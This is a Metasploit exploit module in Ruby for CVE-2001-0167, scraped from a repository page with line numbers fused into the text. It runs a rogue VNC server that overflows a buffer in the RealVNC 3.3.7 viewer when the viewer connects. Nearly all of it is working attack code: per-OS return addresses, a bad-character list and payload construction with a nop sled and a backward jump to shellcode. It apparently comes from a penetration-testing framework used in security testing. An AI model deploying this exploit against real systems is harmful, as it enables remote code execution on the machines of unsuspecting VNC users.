Path: blob/master/modules/exploits/windows/vnc/realvnc_client.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::TcpServer910def initialize(info = {})11super(12update_info(13info,14'Name' => 'RealVNC 3.3.7 Client Buffer Overflow',15'Description' => %q{16This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).17},18'Author' => 'MC',19'License' => MSF_LICENSE,20'References' => [21[ 'CVE', '2001-0167' ],22[ 'OSVDB', '6281' ],23[ 'BID', '2305' ],24],25'DefaultOptions' => {26'EXITFUNC' => 'thread',27},28'Payload' => {29'Space' => 500,30'BadChars' => "\x00\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",31'MaxNops' => 0,32'StackAdjustment' => -3500,33},34'Platform' => 'win',35'Targets' => [36[ 'Windows 2000 SP4 English', { 'Ret' => 0x7c2ec68b } ],37[ 'Windows XP SP2 English', { 'Ret' => 0x77dc15c0 } ],38[ 'Windows 2003 SP1 English', { 'Ret' => 0x76aa679b } ],39],40'Privileged' => false,41'DisclosureDate' => '2001-01-29',42'DefaultTarget' => 0,43'Notes' => {44'Reliability' => UNKNOWN_RELIABILITY,45'Stability' => UNKNOWN_STABILITY,46'SideEffects' => UNKNOWN_SIDE_EFFECTS47}48)49)5051register_options(52[53OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])54]55)56end5758def on_client_connect(client)59rfb = "RFB 003.003\n"6061client.put(rfb)62end6364def on_client_data(client)65return if ((p = regenerate_payload(client)) == nil)6667filler = make_nops(993 - payload.encoded.length)6869sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + filler + payload.encoded70sploit << [target.ret].pack('V') + make_nops(10) + [0xe8, -457].pack('CV')71sploit << rand_text_english(200)7273print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")74client.put(sploit)7576handler77service.close_client(client)78end79end808182